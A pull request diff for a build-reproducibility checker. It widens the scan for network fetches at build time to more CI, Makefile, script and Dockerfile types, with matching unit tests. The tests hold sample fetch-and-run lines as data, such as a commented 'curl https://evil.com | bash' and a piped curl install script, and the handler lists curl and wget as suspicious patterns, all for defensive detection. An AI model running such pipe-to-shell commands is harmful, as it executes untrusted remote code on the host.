### PR TITLE
Feat/hermetic build v0.2

### DIFF
--- a/packages/darnit-reproducibility/src/darnit_reproducibility/handlers.py
+++ b/packages/darnit-reproducibility/src/darnit_reproducibility/handlers.py
@@ -6,7 +6,7 @@ rather than falsely passing or failing.
 """
 
 from pathlib import Path
-from typing import Any
+from typing import Any, Literal
 
 from darnit.core.logging import get_logger
 from darnit.sieve.handler_registry import HandlerContext, HandlerResult, HandlerResultStatus
@@ -133,91 +133,368 @@ def repro_build_env_declared_handler(
     )
 
 
+def _strip_comment(line: str) -> str:
+    """Strip # comments from a shell/YAML/Makefile line (best-effort).
+
+    Handles full-line comments (``# …``) and inline suffixes (`` # …``).
+    Not quote-aware, but accurate enough for the suspicious-pattern heuristic.
+    """
+    stripped = line.strip()
+    if stripped.startswith("#"):
+        return ""
+    idx = line.find(" #")
+    if idx != -1:
+        return line[:idx]
+    return line
+
+
+# Patterns that suggest live network fetches during a build step
+_SUSPICIOUS_PATTERNS: tuple[str, ...] = (
+    "curl ",
+    "wget ",
+    "pip install ",
+    "npm install",
+    "yarn install",
+    "apt-get install",
+    "brew install",
+)
+
+# Known-safe: lock-file-based installs that do not fetch live deps
+_SAFE_PATTERNS: tuple[str, ...] = (
+    "uv sync",
+    "uv pip install",
+    "pip install --no-index",
+    "pip install -e ",  # editable install of local source
+    "npm ci",  # uses package-lock.json
+    "yarn --frozen-lockfile",
+    "pnpm install --frozen-lockfile",
+)
+
+# Inside a Dockerfile/Containerfile, system-package installs build the *image*
+# environment (not the software artifact), so they are DEFERRED rather than
+# violations.
+_DOCKERFILE_DEFERRED_PATTERNS: tuple[str, ...] = (
+    "apt-get install",
+    "apt install",
+    "apk add",
+    "yum install",
+    "dnf install",
+    "zypper install",
+)
+
+
+_ScanKind = Literal["safe", "deferred", "violation"]
+
+
+def _scan_line(line: str, *, is_dockerfile: bool = False) -> tuple[str | None, _ScanKind]:
+    """Classify one line for hermeticity-relevant patterns.
+
+    Strips comments first, then returns ``(pattern, kind)`` where *kind* is:
+
+    - ``"safe"``      — known-good pattern, blank line, or comment; ignore
+    - ``"deferred"``  — acceptable in this file type (e.g. apt-get in Dockerfile)
+    - ``"violation"`` — suspicious live network fetch
+    """
+    clean = _strip_comment(line)
+    if not clean.strip():
+        return None, "safe"
+
+    if any(s in clean for s in _SAFE_PATTERNS):
+        return None, "safe"
+
+    if is_dockerfile:
+        for pat in _DOCKERFILE_DEFERRED_PATTERNS:
+            if pat in clean:
+                return pat.strip(), "deferred"
+
+    for pat in _SUSPICIOUS_PATTERNS:
+        if pat in clean:
+            return pat.strip(), "violation"
+
+    return None, "safe"
+
+
+# Directories whose contents must never be scanned (vendored / generated code)
+_SKIP_DIRS: frozenset[str] = frozenset(
+    {
+        "vendor",
+        "node_modules",
+        ".venv",
+        "venv",
+        ".git",
+        "__pycache__",
+        ".tox",
+        "dist",
+        "build",
+    }
+)
+
+# Bounds per-repo scan cost — monorepos can have hundreds of Makefiles/Dockerfiles.
+_FILE_SCAN_LIMIT = 30
+
+
+def _iter_workflow_files(path: Path) -> list[Path]:
+    """GitHub Actions workflow files under .github/workflows/."""
+    wf_dir = path / ".github" / "workflows"
+    if not wf_dir.exists():
+        return []
+    return list(wf_dir.glob("*.yml")) + list(wf_dir.glob("*.yaml"))
+
+
+def _iter_composite_action_files(path: Path) -> list[Path]:
+    """Composite action.yml files under .github/actions/*/."""
+    actions_dir = path / ".github" / "actions"
+    if not actions_dir.exists():
+        return []
+    results: list[Path] = []
+    for entry in actions_dir.iterdir():
+        if not entry.is_dir():
+            continue
+        for name in ("action.yml", "action.yaml"):
+            f = entry / name
+            if f.exists():
+                results.append(f)
+    return results
+
+
+def _iter_other_ci_files(path: Path) -> list[Path]:
+    """CI config files from non-GitHub systems."""
+    candidates = [
+        ".gitlab-ci.yml",
+        ".circleci/config.yml",
+        ".circleci/config.yaml",
+        "Jenkinsfile",
+        "azure-pipelines.yml",
+        "azure-pipelines.yaml",
+        ".drone.yml",
+        ".drone.yaml",
+        ".buildkite/pipeline.yml",
+        ".buildkite/pipeline.yaml",
+    ]
+    return [path / c for c in candidates if (path / c).exists()]
+
+
+def _iter_build_files(path: Path) -> list[Path]:
+    """Makefiles, build scripts, and setup.py (limited-depth scan)."""
+    results: list[Path] = []
+
+    for name in ("Makefile", "GNUmakefile", "makefile", "setup.py"):
+        p = path / name
+        if p.exists():
+            results.append(p)
+
+    def _find_nested(directory: Path, depth: int) -> None:
+        if depth > 3 or len(results) >= _FILE_SCAN_LIMIT:
+            return
+        try:
+            for entry in directory.iterdir():
+                if entry.name in _SKIP_DIRS:
+                    continue
+                if entry.is_dir():
+                    _find_nested(entry, depth + 1)
+                elif entry.name in ("Makefile", "GNUmakefile", "makefile") and entry not in results:
+                    results.append(entry)
+        except PermissionError:
+            pass
+
+    _find_nested(path, 0)
+
+    for scripts_dir in (path / "scripts", path / "script"):
+        if not scripts_dir.is_dir():
+            continue
+        for f in scripts_dir.iterdir():
+            if not f.is_file():
+                continue
+            lower = f.name.lower()
+            if any(lower.startswith(pfx) for pfx in ("build", "install", "setup", "deps", "bootstrap")):
+                results.append(f)
+
+    return results[:_FILE_SCAN_LIMIT]
+
+
+def _iter_container_files(path: Path) -> list[Path]:
+    """Dockerfile and Containerfile paths, including common subdirectories."""
+    results: list[Path] = []
+    for name in ("Dockerfile", "Containerfile"):
+        p = path / name
+        if p.exists():
+            results.append(p)
+    for subdir in ("docker", "containers", ".docker"):
+        d = path / subdir
+        if not d.is_dir():
+            continue
+        for f in d.iterdir():
+            if f.is_file() and (f.name.startswith("Dockerfile") or f.name.startswith("Containerfile")):
+                results.append(f)
+    return results[:_FILE_SCAN_LIMIT]
+
+
+def _detect_strong_hermeticity_signal(path: Path, ci_files: list[Path]) -> str | None:
+    """Return a description of a build-system-enforced hermeticity signal, or None.
+
+    Checks in priority order:
+    1. Witness runtime attestation — records what the build actually did at runtime
+    2. Nix flake used in CI — fixed-output derivations run network-isolated by default
+    3. Bazel with explicit network sandbox — Bazel allows network by default, so the
+       blocking flag must be present to count as a strong signal
+
+    Comments are stripped before matching (same as ``_scan_line``) so a
+    commented-out reference (e.g. ``# TODO: add witness run``) can't be
+    mistaken for the real thing.
+    """
+    ci_content: dict[str, str] = {}
+    for f in ci_files:
+        try:
+            raw = f.read_text(encoding="utf-8")
+        except Exception:
+            continue
+        ci_content[f.name] = "\n".join(_strip_comment(line) for line in raw.splitlines())
+
+    witness_hits = sorted(
+        name
+        for name, content in ci_content.items()
+        if "witness run" in content or "testifysec/witness" in content or "in-toto/witness" in content
+    )
+    if witness_hits:
+        return f"Witness runtime attestation in CI ({', '.join(witness_hits)})"
+
+    if (path / "flake.nix").exists():
+        nix_hits = sorted(
+            name
+            for name, content in ci_content.items()
+            if any(cmd in content for cmd in ("nix build", "nix develop", "nix run", "nix flake"))
+        )
+        if nix_hits:
+            return f"Nix flake build in CI ({', '.join(nix_hits)})"
+
+    has_bazel = any((path / f).exists() for f in ("WORKSPACE", "WORKSPACE.bazel", "MODULE.bazel", "BUILD.bazel"))
+    if has_bazel:
+        bazel_hits = sorted(
+            name
+            for name, content in ci_content.items()
+            if "bazel" in content.lower()
+            and ("--sandbox_default_allow_network=false" in content or "--sandbox_network=block" in content)
+        )
+        if bazel_hits:
+            return f"Bazel with network sandbox in CI ({', '.join(bazel_hits)})"
+
+    return None
+
+
 def repro_hermetic_build_handler(
     config: dict[str, Any],
     ctx: HandlerContext,
 ) -> HandlerResult:
-    """Check that CI workflows do not fetch dependencies at build time.
+    """Check that CI and build files do not fetch dependencies at build time.
 
-    Scans GitHub Actions workflow files for patterns that indicate
-    live network fetches during the build step.
-    PASS if no fetches found, FAIL if suspicious patterns found,
-    INCONCLUSIVE if no CI files to check.
+    v0.2: Scans GitHub Actions workflows, composite actions, non-GitHub CI
+    files (GitLab CI, CircleCI, Jenkins, Azure Pipelines, Drone, Buildkite),
+    Makefiles, build scripts, and Dockerfiles/Containerfiles.  Strips comments
+    before pattern matching to reduce false positives.  System-package installs
+    inside Dockerfiles are DEFERRED — building the image environment is fine;
+    fetching application dependencies at build time is not.
 
-    v0.1 limitation: only .github/workflows/*.{yml,yaml} are scanned; network
-    fetches from Makefile, setup.py, composite actions or Dockerfile are not
-    detected. See https://github.com/kusari-oss/darnit/issues/227 for the roadmap.
+    Result semantics (conservative-by-default):
+    - PASS:           strong hermeticity signal (Witness, Nix flake CI, Bazel sandbox)
+    - FAIL:           suspicious live network-fetch pattern in any scanned file
+    - INCONCLUSIVE:   files scanned, no violations, no strong signal
+                      (grep absence ≠ proof of hermeticity)
+    - INCONCLUSIVE
+      (confidence 0): no CI or build files found at all
+
+    Roadmap: https://github.com/kusari-oss/darnit/issues/227
     """
     path = Path(ctx.local_path)
-    workflows_dir = path / ".github" / "workflows"
 
-    if not workflows_dir.exists():
+    workflow_files = _iter_workflow_files(path)
+    composite_files = _iter_composite_action_files(path)
+    other_ci_files = _iter_other_ci_files(path)
+    build_files = _iter_build_files(path)
+    container_files = _iter_container_files(path)
+
+    all_ci_files = workflow_files + composite_files + other_ci_files
+    all_files = all_ci_files + build_files + container_files
+
+    if not all_files:
         return HandlerResult(
             status=HandlerResultStatus.INCONCLUSIVE,
-            message="No GitHub Actions workflows found to check",
+            message="No CI or build files found to check",
             confidence=0.0,
-            evidence={"workflows_checked": [], "violations_found": []},
+            evidence={
+                "files_scanned": [],
+                "violations_found": [],
+                "deferred_found": [],
+                "strong_signal": None,
+            },
         )
 
-    # Patterns that suggest live network fetches during build
-    suspicious_patterns = [
-        "curl ",
-        "wget ",
-        "pip install ",
-        "npm install",
-        "yarn install",
-        "apt-get install",
-        "brew install",
-    ]
+    strong_signal = _detect_strong_hermeticity_signal(path, all_ci_files)
+    if strong_signal:
+        return HandlerResult(
+            status=HandlerResultStatus.PASS,
+            message=f"Strong hermeticity signal detected: {strong_signal}",
+            confidence=0.9,
+            evidence={
+                "files_scanned": [str(f.relative_to(path)) for f in all_files],
+                "violations_found": [],
+                "deferred_found": [],
+                "strong_signal": strong_signal,
+            },
+        )
 
-    # Patterns that are fine — these are using the lock file
-    safe_patterns = [
-        "uv sync",
-        "uv pip install",
-        "pip install --no-index",
-        "pip install -e ",  # editable install of local source, not a network fetch
-        "npm ci",         # npm ci uses lock file
-        "yarn --frozen-lockfile",
-    ]
+    container_file_set = set(container_files)
+    violations: list[str] = []
+    deferred: list[str] = []
+    files_scanned: list[str] = []
 
-    violations = []
-    workflow_files = list(workflows_dir.glob("*.yml")) + list(workflows_dir.glob("*.yaml"))
-
-    for wf_file in workflow_files:
+    for f in all_files:
+        is_dockerfile = f in container_file_set
         try:
-            lines = wf_file.read_text(encoding="utf-8").splitlines()
-            for line in lines:
-                # Skip if this line contains a known-safe pattern
-                if any(safe in line for safe in safe_patterns):
-                    continue
-                # Check if this line contains a suspicious pattern
-                for pattern in suspicious_patterns:
-                    if pattern in line:
-                        violations.append(
-                            f"{wf_file.name}: contains '{pattern.strip()}'"
-                        )
-                        break  # one violation per line is enough
+            lines = f.read_text(encoding="utf-8").splitlines()
+            rel = str(f.relative_to(path))
         except Exception as exc:
-            logger.debug("skipped workflow %s: %s", wf_file.name, exc)
+            logger.debug("skipped %s: %s", f, exc)
             continue
 
+        files_scanned.append(rel)
+        file_violation: str | None = None
+        for line in lines:
+            pattern, kind = _scan_line(line, is_dockerfile=is_dockerfile)
+            if kind == "violation":
+                file_violation = f"{rel}: '{pattern}'"
+                break  # one violation per file is enough to flag it
+            elif kind == "deferred" and pattern:
+                deferred.append(f"{rel}: '{pattern}' (image build context)")
+
+        if file_violation:
+            violations.append(file_violation)
+
     evidence = {
-        "workflows_checked": [f.name for f in workflow_files],
+        "files_scanned": files_scanned,
         "violations_found": violations,
+        "deferred_found": deferred,
+        "strong_signal": None,
     }
 
     if violations:
         return HandlerResult(
             status=HandlerResultStatus.FAIL,
-            message=f"Possible live network fetches in CI: {'; '.join(violations)}",
+            message=f"Possible live network fetches in build files: {'; '.join(violations)}",
             confidence=0.7,
             evidence=evidence,
         )
 
+    # Clean scan but no strong signal. Per the conservative-by-default principle,
+    # grep absence is not proof of hermeticity — INCONCLUSIVE until a strong signal
+    # or manual review confirms the build is hermetic.
     return HandlerResult(
-        status=HandlerResultStatus.PASS,
-        message=f"No suspicious network fetches found in {len(workflow_files)} workflow(s)",
-        confidence=0.75,
+        status=HandlerResultStatus.INCONCLUSIVE,
+        message=(
+            f"No suspicious patterns found in {len(files_scanned)} scanned file(s) — "
+            "grep absence alone cannot confirm hermeticity; "
+            "a strong signal (Witness, Nix, Bazel sandbox) or manual review is needed"
+        ),
+        confidence=0.4,
         evidence=evidence,
     )
 
@@ -301,9 +578,9 @@ def repro_bit_for_bit_handler(
     # workflow-only scan can't attribute to build artifacts — they only ever
     # produced false signals.)
     good_signals = [
-        "SOURCE_DATE_EPOCH",   # Normalizes timestamps — required for repro builds
-        "reprotest",           # Tool that builds twice and compares
-        "diffoscope",          # Tool that diffs build artifacts
+        "SOURCE_DATE_EPOCH",  # Normalizes timestamps — required for repro builds
+        "reprotest",  # Tool that builds twice and compares
+        "diffoscope",  # Tool that diffs build artifacts
     ]
 
     found_good = []

--- a/packages/darnit-reproducibility/src/darnit_reproducibility/reproducibility.toml
+++ b/packages/darnit-reproducibility/src/darnit_reproducibility/reproducibility.toml
@@ -78,9 +78,15 @@ steps = [
 # lock file. Network access during build = non-reproducible.
 # =============================================================================
 
-# v0.1 heuristic: greps .github/workflows for network-fetch commands only.
-# Misses Makefile/setup.py/composite actions/Dockerfile and does not verify
-# true build isolation. Roadmap: https://github.com/kusari-oss/darnit/issues/227
+# v0.2 heuristic: scans .github/workflows, composite actions (.github/actions/*/),
+# non-GitHub CI (GitLab CI, CircleCI, Jenkins, Azure Pipelines, Drone, Buildkite),
+# Makefiles, build scripts (scripts/build*, scripts/install*, etc.), and
+# Dockerfiles/Containerfiles.  Strips comments before pattern matching to cut FPs.
+# System-package installs (apt-get, apk, yum) inside Dockerfiles are DEFERRED —
+# building the image environment is acceptable; app-dep fetches at build time are not.
+# Strong signals (Witness runtime attestation, Nix flake CI, Bazel network sandbox)
+# short-circuit to PASS.  A clean grep alone returns INCONCLUSIVE — grep absence is
+# not proof of hermeticity.  Roadmap: https://github.com/kusari-oss/darnit/issues/227
 [controls."RE-02.01"]
 name = "HermeticBuild"
 description = "Build does not fetch dependencies at build time"
@@ -92,9 +98,11 @@ handler = "repro_hermetic_build"
 [[controls."RE-02.01".passes]]
 handler = "manual"
 steps = [
-    "Review CI workflow files for network fetch commands during build",
-    "Check for curl, wget, pip install (without --no-index) in build steps",
-    "Verify dependencies come from the lock file, not fetched live",
+    "Review all CI files (GitHub Actions, GitLab CI, CircleCI, Jenkinsfile, etc.) for network-fetch commands during build",
+    "Review Makefiles, build scripts (scripts/build*, scripts/install*), and Dockerfiles for the same",
+    "Check for curl, wget, pip install (without --no-index), npm install (without --ci), brew install in build steps",
+    "Verify all dependencies come from the lock file, not fetched live at build time",
+    "For a PASS without a strong signal, confirm via Witness attestation, Nix flake build, or Bazel network sandbox",
 ]
 
 # =============================================================================

--- a/scripts/audit_hermetic_real_repos.py
+++ b/scripts/audit_hermetic_real_repos.py
@@ -1,0 +1,79 @@
+"""Manual integration test for repro_hermetic_build_handler against real repos.
+
+Clone the repos you want to check into <repo-dir>/test-<name> (e.g.
+<repo-dir>/test-requests for psf/requests), then run from the repo root:
+
+    uv run python scripts/audit_hermetic_real_repos.py
+    uv run python scripts/audit_hermetic_real_repos.py --repo-dir /path/to/clones
+
+Repo dir resolution order: --repo-dir flag, DARNIT_HERMETIC_AUDIT_DIR env var,
+then the system temp directory.
+"""
+
+import argparse
+import os
+import tempfile
+from pathlib import Path
+
+from darnit_reproducibility.handlers import repro_hermetic_build_handler
+
+from darnit.sieve.handler_registry import HandlerContext
+
+REPOS = [
+    ("test-requests", "psf/requests (Python)"),
+    ("test-hugo", "gohugoio/hugo (Go)"),
+    ("test-redis", "redis/redis (C)"),
+    ("test-ripgrep", "ripgrep (Rust)"),
+    ("test-arrow", "apache/arrow (monorepo)"),
+]
+
+
+def audit(path: Path, label: str) -> None:
+    if not path.exists():
+        print(f"\n{label}")
+        print(f"  SKIPPED — {path} not found (clone it first)")
+        return
+
+    ctx = HandlerContext(local_path=str(path), owner="", repo=path.name)
+    r = repro_hermetic_build_handler({}, ctx)
+
+    files = r.evidence.get("files_scanned", [])
+    viols = r.evidence.get("violations_found", [])
+    deferred = r.evidence.get("deferred_found", [])
+    signal = r.evidence.get("strong_signal")
+
+    print(f"\n{'=' * 60}")
+    print(f"  {label}")
+    print(f"{'=' * 60}")
+    print(f"  status:        {r.status.value.upper()}  (confidence {r.confidence})")
+    print(f"  files scanned: {len(files)}")
+
+    if signal:
+        print(f"  SIGNAL:    {signal}")
+    for v in viols:
+        print(f"  VIOLATION: {v}")
+    for d in deferred:
+        print(f"  DEFERRED:  {d}")
+
+    print(f"\n  {r.message}")
+
+
+def _default_repo_dir() -> Path:
+    env_dir = os.environ.get("DARNIT_HERMETIC_AUDIT_DIR")
+    if env_dir:
+        return Path(env_dir)
+    return Path(tempfile.gettempdir())
+
+
+if __name__ == "__main__":
+    parser = argparse.ArgumentParser(description=__doc__)
+    parser.add_argument(
+        "--repo-dir",
+        type=Path,
+        default=_default_repo_dir(),
+        help="Directory containing test-<name> clones (default: $DARNIT_HERMETIC_AUDIT_DIR or the system temp dir)",
+    )
+    args = parser.parse_args()
+
+    for dirname, repo_label in REPOS:
+        audit(args.repo_dir / dirname, repo_label)

--- a/tests/darnit_reproducibility/test_handlers.py
+++ b/tests/darnit_reproducibility/test_handlers.py
@@ -3,6 +3,14 @@
 from pathlib import Path
 
 from darnit_reproducibility.handlers import (
+    _detect_strong_hermeticity_signal,
+    _iter_build_files,
+    _iter_composite_action_files,
+    _iter_container_files,
+    _iter_other_ci_files,
+    _iter_workflow_files,
+    _scan_line,
+    _strip_comment,
     repro_bit_for_bit_handler,
     repro_build_env_declared_handler,
     repro_deps_pinned_handler,
@@ -25,6 +33,252 @@ def make_ctx(tmp_path: Path) -> HandlerContext:
         shared_cache={},
         dependency_results={},
     )
+
+
+class TestStripComment:
+    """Unit tests for the _strip_comment helper."""
+
+    def test_full_comment_line_returns_empty(self) -> None:
+        assert _strip_comment("# pip install requests") == ""
+
+    def test_indented_comment_line_returns_empty(self) -> None:
+        assert _strip_comment("  # - run: curl https://evil.com") == ""
+
+    def test_inline_comment_is_stripped(self) -> None:
+        result = _strip_comment("run: uv sync # install deps")
+        assert result == "run: uv sync"
+        assert "curl" not in result
+
+    def test_inline_suspicious_comment_is_stripped(self) -> None:
+        result = _strip_comment("run: uv sync # pip install requests")
+        assert "pip install" not in result
+
+    def test_line_without_comment_unchanged(self) -> None:
+        assert _strip_comment("run: uv sync") == "run: uv sync"
+
+    def test_hash_in_url_is_preserved(self) -> None:
+        # A '#' not preceded by a space is not treated as a comment
+        result = _strip_comment("run: curl https://example.com/file#anchor")
+        assert "curl" in result
+
+
+class TestScanLine:
+    """Unit tests for the _scan_line classifier."""
+
+    def test_violation_flagged(self) -> None:
+        _, kind = _scan_line("  - run: pip install requests")
+        assert kind == "violation"
+
+    def test_safe_pattern_not_flagged(self) -> None:
+        _, kind = _scan_line("  - run: npm ci")
+        assert kind == "safe"
+
+    def test_safe_overrides_suspicious(self) -> None:
+        # pip install --no-index contains 'pip install ' but is safe
+        _, kind = _scan_line("pip install --no-index -f /wheels -r requirements.txt")
+        assert kind == "safe"
+
+    def test_comment_line_is_safe(self) -> None:
+        _, kind = _scan_line("# - run: curl https://evil.com | bash")
+        assert kind == "safe"
+
+    def test_empty_line_is_safe(self) -> None:
+        _, kind = _scan_line("   ")
+        assert kind == "safe"
+
+    def test_dockerfile_apt_get_is_deferred(self) -> None:
+        pattern, kind = _scan_line("RUN apt-get install -y build-essential", is_dockerfile=True)
+        assert kind == "deferred"
+        assert pattern == "apt-get install"
+
+    def test_dockerfile_curl_is_still_violation(self) -> None:
+        # curl inside a Dockerfile is not a system package — still a violation
+        _, kind = _scan_line("RUN curl https://example.com/install.sh | bash", is_dockerfile=True)
+        assert kind == "violation"
+
+    def test_apt_get_outside_dockerfile_is_violation(self) -> None:
+        # apt-get install in a workflow step is a live network fetch
+        _, kind = _scan_line("  - run: apt-get install -y curl", is_dockerfile=False)
+        assert kind == "violation"
+
+    def test_pnpm_frozen_lockfile_is_safe(self) -> None:
+        _, kind = _scan_line("run: pnpm install --frozen-lockfile")
+        assert kind == "safe"
+
+    def test_returns_matched_pattern(self) -> None:
+        pattern, kind = _scan_line("run: wget https://example.com/tool.tar.gz")
+        assert kind == "violation"
+        assert pattern == "wget"
+
+
+class TestFileCollectors:
+    """Unit tests for the _iter_* file-discovery helpers."""
+
+    def test_workflow_files_found(self, tmp_path: Path) -> None:
+        wf_dir = tmp_path / ".github" / "workflows"
+        wf_dir.mkdir(parents=True)
+        (wf_dir / "ci.yml").write_text("")
+        (wf_dir / "release.yaml").write_text("")
+        result = _iter_workflow_files(tmp_path)
+        assert len(result) == 2
+
+    def test_workflow_files_missing_dir(self, tmp_path: Path) -> None:
+        assert _iter_workflow_files(tmp_path) == []
+
+    def test_composite_action_files_found(self, tmp_path: Path) -> None:
+        action_dir = tmp_path / ".github" / "actions" / "setup"
+        action_dir.mkdir(parents=True)
+        (action_dir / "action.yml").write_text("")
+        result = _iter_composite_action_files(tmp_path)
+        assert len(result) == 1
+        assert result[0].name == "action.yml"
+
+    def test_composite_action_files_missing_dir(self, tmp_path: Path) -> None:
+        assert _iter_composite_action_files(tmp_path) == []
+
+    def test_other_ci_gitlab(self, tmp_path: Path) -> None:
+        (tmp_path / ".gitlab-ci.yml").write_text("")
+        result = _iter_other_ci_files(tmp_path)
+        assert any(f.name == ".gitlab-ci.yml" for f in result)
+
+    def test_other_ci_circleci(self, tmp_path: Path) -> None:
+        circleci = tmp_path / ".circleci"
+        circleci.mkdir()
+        (circleci / "config.yml").write_text("")
+        result = _iter_other_ci_files(tmp_path)
+        assert any("config.yml" in str(f) for f in result)
+
+    def test_other_ci_none_present(self, tmp_path: Path) -> None:
+        assert _iter_other_ci_files(tmp_path) == []
+
+    def test_build_files_root_makefile(self, tmp_path: Path) -> None:
+        (tmp_path / "Makefile").write_text("")
+        result = _iter_build_files(tmp_path)
+        assert any(f.name == "Makefile" for f in result)
+
+    def test_build_files_nested_makefile(self, tmp_path: Path) -> None:
+        sub = tmp_path / "cmd" / "server"
+        sub.mkdir(parents=True)
+        (sub / "Makefile").write_text("")
+        result = _iter_build_files(tmp_path)
+        assert any(f.name == "Makefile" for f in result)
+
+    def test_build_files_skips_vendor(self, tmp_path: Path) -> None:
+        vendor = tmp_path / "vendor" / "pkg"
+        vendor.mkdir(parents=True)
+        (vendor / "Makefile").write_text("")
+        result = _iter_build_files(tmp_path)
+        assert not any("vendor" in str(f) for f in result)
+
+    def test_build_files_scripts_dir(self, tmp_path: Path) -> None:
+        scripts = tmp_path / "scripts"
+        scripts.mkdir()
+        (scripts / "build.sh").write_text("")
+        (scripts / "install-deps.sh").write_text("")
+        result = _iter_build_files(tmp_path)
+        names = [f.name for f in result]
+        assert "build.sh" in names
+        assert "install-deps.sh" in names
+
+    def test_container_files_root_dockerfile(self, tmp_path: Path) -> None:
+        (tmp_path / "Dockerfile").write_text("")
+        result = _iter_container_files(tmp_path)
+        assert any(f.name == "Dockerfile" for f in result)
+
+    def test_container_files_subdir(self, tmp_path: Path) -> None:
+        docker_dir = tmp_path / "docker"
+        docker_dir.mkdir()
+        (docker_dir / "Dockerfile.prod").write_text("")
+        result = _iter_container_files(tmp_path)
+        assert any(f.name == "Dockerfile.prod" for f in result)
+
+    def test_container_files_none_present(self, tmp_path: Path) -> None:
+        assert _iter_container_files(tmp_path) == []
+
+
+class TestDetectStrongSignal:
+    """Unit tests for _detect_strong_hermeticity_signal."""
+
+    def test_returns_none_with_no_signals(self, tmp_path: Path) -> None:
+        result = _detect_strong_hermeticity_signal(tmp_path, [])
+        assert result is None
+
+    def test_witness_run_detected(self, tmp_path: Path) -> None:
+        wf = tmp_path / "ci.yml"
+        wf.write_text("- run: witness run -- make build\n")
+        result = _detect_strong_hermeticity_signal(tmp_path, [wf])
+        assert result is not None
+        assert "Witness" in result
+
+    def test_testifysec_witness_action_detected(self, tmp_path: Path) -> None:
+        wf = tmp_path / "ci.yml"
+        wf.write_text("uses: testifysec/witness-run-action@v0.1\n")
+        result = _detect_strong_hermeticity_signal(tmp_path, [wf])
+        assert result is not None
+        assert "Witness" in result
+
+    def test_nix_flake_with_nix_build_in_ci(self, tmp_path: Path) -> None:
+        (tmp_path / "flake.nix").write_text("{ outputs = {}; }")
+        wf = tmp_path / "ci.yml"
+        wf.write_text("- run: nix build .#default\n")
+        result = _detect_strong_hermeticity_signal(tmp_path, [wf])
+        assert result is not None
+        assert "Nix" in result
+
+    def test_nix_flake_present_but_no_ci_usage(self, tmp_path: Path) -> None:
+        (tmp_path / "flake.nix").write_text("{ outputs = {}; }")
+        wf = tmp_path / "ci.yml"
+        wf.write_text("- run: uv sync\n")
+        result = _detect_strong_hermeticity_signal(tmp_path, [wf])
+        assert result is None
+
+    def test_bazel_with_network_sandbox_flag(self, tmp_path: Path) -> None:
+        (tmp_path / "MODULE.bazel").write_text("module(name = 'myproject')")
+        wf = tmp_path / "ci.yml"
+        wf.write_text("- run: bazel build //... --sandbox_default_allow_network=false\n")
+        result = _detect_strong_hermeticity_signal(tmp_path, [wf])
+        assert result is not None
+        assert "Bazel" in result
+
+    def test_bazel_workspace_without_sandbox_flag(self, tmp_path: Path) -> None:
+        # Bazel allows network by default — workspace alone is not enough
+        (tmp_path / "WORKSPACE").write_text("")
+        wf = tmp_path / "ci.yml"
+        wf.write_text("- run: bazel build //...\n")
+        result = _detect_strong_hermeticity_signal(tmp_path, [wf])
+        assert result is None
+
+    def test_witness_takes_priority_over_nix(self, tmp_path: Path) -> None:
+        (tmp_path / "flake.nix").write_text("{ outputs = {}; }")
+        wf = tmp_path / "ci.yml"
+        wf.write_text("- run: witness run -- nix build .#default\n")
+        result = _detect_strong_hermeticity_signal(tmp_path, [wf])
+        assert result is not None
+        assert "Witness" in result
+
+    def test_commented_witness_reference_is_not_a_signal(self, tmp_path: Path) -> None:
+        wf = tmp_path / "ci.yml"
+        wf.write_text("# TODO: add witness run someday\nsteps:\n  - run: uv sync\n")
+        result = _detect_strong_hermeticity_signal(tmp_path, [wf])
+        assert result is None
+
+    def test_commented_nix_reference_is_not_a_signal(self, tmp_path: Path) -> None:
+        (tmp_path / "flake.nix").write_text("{ outputs = {}; }")
+        wf = tmp_path / "ci.yml"
+        wf.write_text("# TODO: nix build .#default someday\nsteps:\n  - run: uv sync\n")
+        result = _detect_strong_hermeticity_signal(tmp_path, [wf])
+        assert result is None
+
+    def test_commented_bazel_sandbox_flag_is_not_a_signal(self, tmp_path: Path) -> None:
+        (tmp_path / "MODULE.bazel").write_text("module(name = 'myproject')")
+        wf = tmp_path / "ci.yml"
+        wf.write_text(
+            "steps:\n"
+            "  # TODO: bazel build //... --sandbox_default_allow_network=false\n"
+            "  - run: bazel build //...\n"
+        )
+        result = _detect_strong_hermeticity_signal(tmp_path, [wf])
+        assert result is None
 
 
 class TestRepoDepsPin:
@@ -93,18 +347,40 @@ class TestBuildEnvDeclared:
 
 
 class TestHermeticBuild:
-    """Tests for repro_hermetic_build_handler()."""
+    """Integration tests for repro_hermetic_build_handler()."""
 
-    def test_inconclusive_with_no_workflows(self, tmp_path: Path) -> None:
+    # ------------------------------------------------------------------
+    # No files
+    # ------------------------------------------------------------------
+
+    def test_inconclusive_with_no_files(self, tmp_path: Path) -> None:
         result = repro_hermetic_build_handler({}, make_ctx(tmp_path))
         assert result.status == HandlerResultStatus.INCONCLUSIVE
+        assert result.confidence == 0.0
 
-    def test_pass_with_clean_workflow(self, tmp_path: Path) -> None:
+    # ------------------------------------------------------------------
+    # Clean grep → INCONCLUSIVE (not PASS — grep absence ≠ hermeticity)
+    # ------------------------------------------------------------------
+
+    def test_inconclusive_with_clean_workflow(self, tmp_path: Path) -> None:
         wf_dir = tmp_path / ".github" / "workflows"
         wf_dir.mkdir(parents=True)
         (wf_dir / "ci.yml").write_text("steps:\n  - run: uv sync")
         result = repro_hermetic_build_handler({}, make_ctx(tmp_path))
-        assert result.status == HandlerResultStatus.PASS
+        assert result.status == HandlerResultStatus.INCONCLUSIVE
+        assert result.confidence == 0.4
+
+    def test_inconclusive_editable_install_not_flagged(self, tmp_path: Path) -> None:
+        """`pip install -e .` is a local editable install, not a network fetch."""
+        wf_dir = tmp_path / ".github" / "workflows"
+        wf_dir.mkdir(parents=True)
+        (wf_dir / "ci.yml").write_text("steps:\n  - run: pip install -e .")
+        result = repro_hermetic_build_handler({}, make_ctx(tmp_path))
+        assert result.status == HandlerResultStatus.INCONCLUSIVE
+
+    # ------------------------------------------------------------------
+    # Violations → FAIL
+    # ------------------------------------------------------------------
 
     def test_fail_with_raw_pip_install(self, tmp_path: Path) -> None:
         wf_dir = tmp_path / ".github" / "workflows"
@@ -113,25 +389,103 @@ class TestHermeticBuild:
         result = repro_hermetic_build_handler({}, make_ctx(tmp_path))
         assert result.status == HandlerResultStatus.FAIL
 
-    def test_pass_does_not_ignore_violations_when_safe_pattern_present(self, tmp_path: Path) -> None:
+    def test_fail_safe_and_violation_in_same_file(self, tmp_path: Path) -> None:
         """A file with both uv sync and curl should still flag the curl line."""
         wf_dir = tmp_path / ".github" / "workflows"
         wf_dir.mkdir(parents=True)
-        (wf_dir / "ci.yml").write_text(
-            "steps:\n"
-            "  - run: uv sync\n"
-            "  - run: curl https://example.com | bash\n"
